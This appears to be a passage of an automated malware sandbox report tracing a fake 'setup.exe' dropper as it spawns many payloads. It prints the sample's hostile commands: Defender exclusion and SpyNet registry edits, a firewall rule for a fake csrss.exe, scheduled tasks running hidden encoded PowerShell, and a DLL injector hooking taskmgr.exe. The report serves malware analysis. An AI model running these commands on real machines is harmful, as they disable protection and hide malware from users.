Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2292 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe
PID 2292 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe
PID 2292 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe
PID 2292 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe
PID 2292 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
PID 2292 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
PID 2292 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
PID 2292 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe
PID 2292 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe
PID 2292 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe
PID 2292 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe
PID 2292 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe
PID 2292 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe
PID 2292 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe
PID 2292 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe
PID 2292 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe
PID 2292 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
PID 2292 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
PID 2292 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
PID 2292 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe
PID 2292 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe
PID 2292 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe
PID 2292 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe
PID 2292 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2292 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 2352 wrote to memory of 572 N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 1408 wrote to memory of 2888 N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe
PID 2888 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
PID 2888 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
PID 2888 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
PID 2888 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe
PID 2888 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe

"C:\Users\Admin\Documents\GuardFox\bQOLs_KzAajPMcBahu3Ki1Xn.exe"

C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe

"C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe"

C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe

"C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe"

C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp

"C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp" /SL5="$60136,4078676,54272,C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe"

C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe

"C:\Users\Admin\Documents\GuardFox\ld8Q44Ookby2IoAmF2mmqlTH.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe

.\Install.exe /cdidqlUao "525403" /S

C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe

"C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe"

C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe

"C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe"

C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe

"C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe"

C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe

"C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe"

C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe

"C:\Users\Admin\Documents\GuardFox\ZGhfF8uvNlyBvpurdLETtmk_.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240223090023.log C:\Windows\Logs\CBS\CbsPersist_20240223090023.cab

C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe

"C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5539758,0x7fef5539768,0x7fef5539778

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gBVIaQAaO" /SC once /ST 06:57:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gBVIaQAaO"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {189EDEEA-DF8B-4309-AFAA-22A85260AC03} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1424 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1448,i,4869214669569361197,983088060033817693,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

